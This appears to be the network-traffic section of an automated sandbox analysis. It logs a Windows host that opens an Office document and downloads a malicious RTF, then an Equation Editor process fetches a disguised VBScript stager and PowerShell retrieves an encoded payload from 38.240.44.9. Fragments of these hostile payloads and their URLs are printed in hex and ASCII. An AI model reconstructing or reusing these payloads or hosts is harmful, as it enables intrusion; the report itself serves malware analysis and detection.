                                                                                                                                                                    Oct 7, 2024 14:53:18.153951883 CEST8.8.8.8192.168.2.220x38a8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                    • m2g.me
                                                                                                                                                                    • raw.githubusercontent.com
                                                                                                                                                                    • 38.240.44.9
                                                                                                                                                                    • geoplugin.net
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.224916438.240.44.9803320C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Oct 7, 2024 14:52:45.666415930 CEST499OUTGET /450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                    Host: 38.240.44.9
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Oct 7, 2024 14:52:46.484878063 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:52:47 GMT
                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                    Last-Modified: Mon, 07 Oct 2024 07:28:05 GMT
                                                                                                                                                                    ETag: "18502-623ddf62aefb4"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 99586
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/msword
                                                                                                                                                                    Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 41 71 65 68 51 34 49 38 45 55 6b 6c 63 6e 62 39 73 7a 4f 79 34 66 71 4d 74 5a 4c 57 6a 4b 5a 67 31 52 57 41 6e 63 66 71 58 46 54 6b 46 38 79 77 6c 61 74 67 4c 63 67 70 56 56 37 54 36 59 73 6c 62 32 63 42 6c 61 33 6e 4f 64 57 79 50 38 61 48 45 68 34 61 4a 6b 44 52 30 36 41 6e 5a 69 64 6f 62 66 72 31 57 56 72 6c 51 67 6f 6a 46 4c 70 79 76 4d 71 77 38 61 73 78 30 4e 51 6e 4a 4c 44 61 65 4e 39 7a 42 75 54 57 4b 52 46 48 75 48 37 6d 56 62 37 33 77 66 33 41 43 4d 6d 6a 53 79 33 73 51 41 4f 4b 76 4a 49 73 6a 76 6b 76 61 55 71 55 64 53 6f 43 75 57 39 71 45 7d 0d 0d 7b 5c 36 34 36 30 39 37 35 39 35 28 2a 3b 32 25 7e 3d 2b 3f 2f 23 5e 25 21 7c 34 3a 2e 3b 27 3b 3f 25 32 25 a7 2f 3f 5d 36 32 60 5b 3b 2d 3f 2f 7e 3f b0 29 2e 2b 29 40 3c b0 7c 5d 25 2f 5d 3f 5f a7 28 2b 34 3f 39 25 3f 7c 7c 3c 3b 36 37 37 38 2a 2e 3f 28 21 34 35 23 3c 26 5d 3f 3f 2f 7c a7 2f 7e a7 2c 3d 29 2d 39 3f 3d 23 5b 37 31 24 3b 2f 21 3a 29 3b 3f 7c a7 37 40 25 29 2d 60 27 32 23 5d 7c 36 2b 3b 3a 3d b0 [TRUNCATED]
                                                                                                                                                                    Data Ascii: {\rtf1{\*\AqehQ4I8EUklcnb9szOy4fqMtZLWjKZg1RWAncfqXFTkF8ywlatgLcgpVV7T6Yslb2cBla3nOdWyP8aHEh4aJkDR06AnZidobfr1WVrlQgojFLpyvMqw8asx0NQnJLDaeN9zBuTWKRFHuH7mVb73wf3ACMmjSy3sQAOKvJIsjvkvaUqUdSoCuW9qE}{\646097595(*;2%~=+?/#^%!|4:.;';?%2%/?]62`[;-?/~?).+)@<|]%/]?_(+4?9%?||<;6778*.?(!45#<&]??/|/~,=)-9?=#[71$;/!:);?|7@%)-`'2#]|6+;:=?.?1*_^=8.'=:/2?_>`!14)53?^^[=?~3%~29,8,_>@5?8@=~:%@;93~1!.9[`*-+?75$[?<#12'8!%)12-*6?&.+[8'.^`/`>[557!99?&.?[|3??=|4?6@;-6=,;@~7'/5>1`=0=8,118`3??#:%?|~9;!#*?[&5+*4:#?%)2/$9~0#_?`%]4:-9:2%-%1?6)`&%8%~?[/&?4+/9?1!?5?1+_8&)%8;;?<,>/30=<$9@?=8#$&%=6*3?6@,8/#8?>8'%&7![&54!8^[]49@^)3[7&&*9?>9%0,5?1%2<]?<?_@^,#6;5%1(<>?>(?>)&/,);?&<#?=2<?+:@-`((_#!@+0!?~'|%47%?8;!19|/,@`5=]`@=+$21(%.~'/!5%+*?+$25~?$&(.(^$*4-%?#)%->-#:?9~>|*;=],^;%@?<#0~&%??,#>8(`4'$%4$#+,?~.?7<;@4?`<[*3-`(2)?]5$1??826361^)**29???[%-1-*9?82+#31&@%_?&2%;`.*95?|5.?2.+???^[[+47'
                                                                                                                                                                    Oct 7, 2024 14:52:46.484915972 CEST1236INData Raw: 35 34 25 b5 3d 3d 2b 3f 3a 21 3e 7e 3c 5b b5 39 23 b0 30 30 30 36 2f 25 2e 24 31 28 40 2e 3f 3d 7e 5b 30 7c 3b 3b 40 21 3f 25 2b 25 b0 3f 37 39 3f 3e 40 34 37 60 35 7e 27 3e 60 3f 3f a7 34 34 b0 25 3f 37 37 b0 3a 27 3f 31 26 2e 3b 37 5d 7c 5f 21
                                                                                                                                                                    Data Ascii: 54%==+?:!>~<[9#0006/%.$1(@.?=~[0|;;@!?%+%?79?>@47`5~'>`??44%?77:'?1&.;7]|_!38=/3!`=]!/88$&%2?5[?/#:?[1@|`9<=177:%$%36?/;/|(^~-|^0:<:9;.?8|`-,4!=7|_!#%&:/.2@'???|(_???>7`35??<'5^6[@$-;3?<7~5?[)7[1:$|,:820>)))(2=)=]_).?=-^+?8-#20:
                                                                                                                                                                    Oct 7, 2024 14:52:46.484951973 CEST1236INData Raw: 3a 2e b5 b5 2b a7 3f 5b 3a 2e 7c 3f 2e 24 5f 40 b0 36 3f 3f 40 27 2c 33 40 2e 28 40 21 3e 3f 3e 27 34 25 2c 26 25 34 27 3f 37 33 60 2a 2c 3e 3d 2e 3f 7e 5e 26 3b 31 28 40 2c 3a 3f 29 5e 3a 2b 60 3c 5b b5 3a 3c 2e 31 5d 2e 28 39 3b b5 36 25 60 34
                                                                                                                                                                    Data Ascii: :.+?[:.|?.$_@6??@',3@.(@!>?>'4%,&%4'?73`*,>=.?~^&;1(@,:?)^:+`<[:<.1].(9;6%`41>:/)?/.=-*(-/62%:`,=%3'@<'6_|?0),=*#17?'*?.?6<?6@2&$+|`62)*5:?<,?+%_!0-<](!$(8)8,=/~`@$?`3(!07@]#%5:;?<=87,%9%>6&^&8_%_?:/<;?=/<%@@23<?;|??]5(#?4+
                                                                                                                                                                    Oct 7, 2024 14:52:46.484966993 CEST1236INData Raw: 39 3f 26 2f 5f 34 24 24 31 27 2c 3f 7c 5f 2d 26 23 3f 3f 3f 3f 3e 23 39 2d 5b 3f 2e 7c 25 3c 32 2f 60 35 3f 2a 23 40 39 3f 28 60 23 3f 7e 36 3e 2c 31 3f 25 28 2b 30 29 5e 38 25 3f 37 3f 24 33 31 5d 3a 2c 3f 40 36 24 33 7e 3f 2b 2b a7 7c 33 38 3e
                                                                                                                                                                    Data Ascii: 9?&/_4$$1',?|_-&#????>#9-[?.|%<2/`5?*#@9?(`#?~6>,1?%(+0)^8%?7?$31]:,?@6$3~?++|38>~@!%0^:`)?[;5<#42%`<=+&|(=1;-]?13^1'?<;%_&+'1[)9,[33]&7&`?(3[+/+%_~;%(;%=;?)/?26|-];</;^%7!1[+,!/%???8:<'39115%?%-`?|??5.~30$+60&2|(_'*]-@?32].#(&)
                                                                                                                                                                    Oct 7, 2024 14:52:46.484982014 CEST896INData Raw: 58 39 36 59 4a 70 4d 46 31 59 70 36 77 5a 65 44 37 71 6e 48 69 72 55 35 69 6e 37 43 6c 6d 33 74 4a 55 37 4f 32 79 78 48 53 6b 72 46 6f 34 6c 30 48 64 58 59 45 46 56 58 30 32 37 31 69 66 38 51 51 32 6b 69 58 31 37 73 51 59 45 62 49 31 6f 45 51 6a
                                                                                                                                                                    Data Ascii: X96YJpMF1Yp6wZeD7qnHirU5in7Clm3tJU7O2yxHSkrFo4l0HdXYEFVX0271if8QQ2kiX17sQYEbI1oEQje1Qs4VyTkGfpgThNz8wEsOlHRlerFuhUM0SKjNy22QAiWjLCDR6ZRwKwSkaQSagSltSEDLwaznbuRPwRO7NoY7FmAvBH4Mfcp3u4B4qbojWuCpdewxQz6EfLx54RyTqVxHTqYrpbv3ZkiEZMGjt80WlAF0wx4ELeY
                                                                                                                                                                    Oct 7, 2024 14:52:46.679188013 CEST1236INData Raw: 20 09 09 09 09 20 20 09 20 09 09 09 20 09 09 20 20 09 20 09 09 09 09 09 09 20 20 09 30 32 0d 0d 0a 0a 0a 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 30 30 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0d 0a 0a 0a 0d 30 0d 0a 0d 0a 0d 0d 0d 0d 0a 0d 0d 0a 0a 0a 0d 30 20 09 20
                                                                                                                                                                    Data Ascii: 020000 000b0
                                                                                                                                                                    Oct 7, 2024 14:52:46.679241896 CEST1236INData Raw: 09 20 09 20 20 20 20 20 20 20 09 09 20 20 09 20 09 20 09 09 09 20 20 20 09 09 20 20 09 30 30 20 09 20 20 09 09 20 09 09 09 09 20 09 20 09 09 09 20 09 20 09 09 09 20 09 09 09 09 09 20 20 20 09 09 09 09 09 09 20 09 20 09 20 20 20 20 20 09 20 20 20
                                                                                                                                                                    Data Ascii: 00 0 0000af
                                                                                                                                                                    Oct 7, 2024 14:52:46.679256916 CEST1236INData Raw: 20 20 20 20 09 20 09 09 20 09 09 20 09 20 09 09 09 20 09 20 20 20 09 09 20 09 20 09 20 20 61 20 09 09 20 20 20 09 20 09 20 09 20 20 20 09 20 20 09 20 09 09 20 09 20 09 20 20 20 09 20 20 09 09 20 20 20 09 20 09 09 20 20 20 09 09 20 09 09 09 20 20
                                                                                                                                                                    Data Ascii: a 8b03 bb9
                                                                                                                                                                    Oct 7, 2024 14:52:46.679271936 CEST1236INData Raw: 20 20 20 20 09 09 20 20 09 20 09 20 09 09 09 09 20 09 09 20 09 09 20 09 20 09 20 20 65 0d 0a 0a 0a 0d 0d 0a 0a 0a 0d 0d 0d 0a 0a 0d 34 32 30 30 65 09 20 20 09 09 09 09 09 20 20 09 09 20 20 09 20 20 20 09 20 09 20 20 09 09 09 20 20 09 20 09 20 20
                                                                                                                                                                    Data Ascii: e4200e 61 3d230
                                                                                                                                                                    Oct 7, 2024 14:52:46.679286003 CEST1236INData Raw: 20 09 20 20 20 09 09 09 20 09 20 09 09 20 09 20 09 20 20 09 09 09 20 20 20 20 09 20 20 20 09 20 20 09 09 20 09 09 20 09 09 09 09 20 09 09 20 09 20 09 20 09 09 20 09 09 20 09 20 09 20 20 31 0a 0d 0a 0d 0d 0a 0d 0d 0a 0d 0d 0a 0a 0d 0d 38 33 0a 0d
                                                                                                                                                                    Data Ascii: 1838b fa11
                                                                                                                                                                    Oct 7, 2024 14:52:46.679599047 CEST1236INData Raw: 20 09 09 20 09 20 09 20 20 33 32 62 61 20 09 20 09 20 09 20 20 09 20 20 20 20 20 20 09 20 09 09 20 09 09 09 09 20 09 09 09 09 09 20 09 09 20 20 09 09 09 20 20 20 20 09 09 20 20 09 20 20 20 20 09 20 09 09 20 20 20 20 20 20 20 20 09 20 09 20 09 20
                                                                                                                                                                    Data Ascii: 32ba eda0 b706cf1


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.224917138.240.44.9803616C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Oct 7, 2024 14:53:02.279489040 CEST312OUTHEAD /450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc HTTP/1.1
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 38.240.44.9
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Oct 7, 2024 14:53:03.091490030 CEST322INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:04 GMT
                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                    Last-Modified: Mon, 07 Oct 2024 07:28:05 GMT
                                                                                                                                                                    ETag: "18502-623ddf62aefb4"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 99586
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/msword


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.224917238.240.44.9803976C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Oct 7, 2024 14:53:03.434933901 CEST334OUTGET /450/newsweetnesswithverynicecute.Tif HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                    Host: 38.240.44.9
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Oct 7, 2024 14:53:04.251970053 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:05 GMT
                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                    Last-Modified: Mon, 07 Oct 2024 05:24:06 GMT
                                                                                                                                                                    ETag: "2f782-623dc3acd3d45"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 194434
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: image/tiff
                                                                                                                                                                    Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 72 00 6f 00 78 00 65 00 61 00 72 00 28 00 63 00 61 00 6e 00 64 00 65 00 6c 00 61 00 2c 00 20 00 65 00 73 00 74 00 72 00 6f 00 70 00 65 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 2c 00 20 00 68 00 79 00 70 00 6f 00 70 00 6c 00 61 00 73 00 69 00 61 00 2c 00 20 00 65 00 73 00 74 00 61 00 6c 00 61 00 6a 00 61 00 64 00 65 00 69 00 72 00 61 00 2c 00 20 00 61 00 64 00 61 00 67 00 69 00 65 00 69 00 72 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 [TRUNCATED]
                                                                                                                                                                    Data Ascii: private function roxear(candela, estropeamento, hypoplasia, estalajadeira, adagieiro) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if hypoplasia.ArgumentExists(NPARA_FILTER) then filter = hypoplasia.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if hypoplasia.ArgumentExists(NPARA_DIALECT) then dialect = hypoplasia.Argument(
                                                                                                                                                                    Oct 7, 2024 14:53:04.251987934 CEST1236INData Raw: 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 49 00 66 00 20
                                                                                                                                                                    Data Ascii: NPARA_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbe
                                                                                                                                                                    Oct 7, 2024 14:53:04.251998901 CEST1236INData Raw: 00 65 00 72 00 20 00 3d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 00 20 00 26 00 20
                                                                                                                                                                    Data Ascii: er = filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next
                                                                                                                                                                    Oct 7, 2024 14:53:04.252008915 CEST1236INData Raw: 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61 00 72 00 61
                                                                                                                                                                    Data Ascii: RTBOOL false, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (hypoplasia
                                                                                                                                                                    Oct 7, 2024 14:53:04.252019882 CEST896INData Raw: 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 68 00 79 00 70 00 6f 00 70 00 6c 00 61 00 73 00 69 00 61 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52
                                                                                                                                                                    Data Ascii: if hypoplasia.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(hypoplasia.Argument(NPARA_RETURN_TYP
                                                                                                                                                                    Oct 7, 2024 14:53:04.444832087 CEST1236INData Raw: 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54 00 55 00 52 00 4e 00 5f 00 54 00 59 00 50 00 45 00 20 00 26 00 20 00 22 00 3a 00 22 00 20 00 26 00 20 00 68 00 79 00 70 00 6f 00 70 00 6c 00 61 00 73 00 69 00 61
                                                                                                                                                                    Data Ascii: -" & NPARA_RETURN_TYPE & ":" & hypoplasia.Argument(NPARA_RETURN_TYPE) & " is not a valid option" end select
                                                                                                                                                                    Oct 7, 2024 14:53:04.444884062 CEST1236INData Raw: 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 65 00 74 00 20 00 65 00 20 00 3d 00 20 00 65 00 73 00 74 00 72 00 6f 00 70 00 65 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 2e 00 72 00 6f 00 78 00 65 00 61
                                                                                                                                                                    Data Ascii: then set e = estropeamento.roxear(estalajadeira, filter, dialect, flags) if Err.Number = T_O then
                                                                                                                                                                    Oct 7, 2024 14:53:04.444895983 CEST448INData Raw: 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6f 00 6e 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 73 00 75 00 6d 00 65 00 20 00 6e 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20
                                                                                                                                                                    Data Ascii: Stream on error resume next res = e.ReadItem() if Err.Number = T_O then res = e.R
                                                                                                                                                                    Oct 7, 2024 14:53:04.444905996 CEST1236INData Raw: 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 45 00 72 00 72 00 2e 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3c
                                                                                                                                                                    Data Ascii: end if if Err.Number <> 0 then stdErr.WriteLine e.Error wscript.echo "</wsma
                                                                                                                                                                    Oct 7, 2024 14:53:04.444917917 CEST1236INData Raw: 00 69 00 6f 00 6e 00 0d 00 0a 00 5a 00 52 00 74 00 65 00 4c 00 64 00 75 00 4c 00 6b 00 51 00 53 00 70 00 7a 00 76 00 7a 00 20 00 3d 00 20 00 22 00 64 00 4c 00 68 00 5a 00 4c 00 78 00 42 00 73 00 70 00 62 00 63 00 6c 00 5a 00 55 00 65 00 22 00 0d
                                                                                                                                                                    Data Ascii: ionZRteLduLkQSpzvz = "dLhZLxBspbclZUe"PUKoJlNWlxstAWW = "UKKIdppGoKKrkHs"GfLWGeNWzqAcGzu = "rckcZAasWqTHBRW"boKCN
                                                                                                                                                                    Oct 7, 2024 14:53:04.444930077 CEST1236INData Raw: 00 20 00 3d 00 20 00 22 00 47 00 4b 00 41 00 4f 00 63 00 4c 00 61 00 71 00 6d 00 6c 00 52 00 4c 00 57 00 68 00 78 00 22 00 0d 00 0a 00 64 00 43 00 4c 00 68 00 78 00 72 00 65 00 4e 00 62 00 63 00 57 00 70 00 47 00 69 00 6c 00 20 00 3d 00 20 00 22
                                                                                                                                                                    Data Ascii: = "GKAOcLaqmlRLWhx"dCLhxreNbcWpGil = "iZkLkLTWooCWLWe"gRGiiWzrJiAWLBB = "dlhsaLppzLqLWeA"umpkAWKioWLGLpW = "ciKLLN


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.224917638.240.44.9802880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Oct 7, 2024 14:53:13.321748972 CEST76OUTGET /450/RDSSSER.txt HTTP/1.1
                                                                                                                                                                    Host: 38.240.44.9
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Oct 7, 2024 14:53:14.130791903 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 07 Oct 2024 12:53:15 GMT
                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                    Last-Modified: Mon, 07 Oct 2024 05:21:00 GMT
                                                                                                                                                                    ETag: "a1000-623dc2fbbefeb"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 659456
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                    Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                    Oct 7, 2024 14:53:14.130815983 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                    Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                    Oct 7, 2024 14:53:14.130831957 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                    Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                    Oct 7, 2024 14:53:14.130846977 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
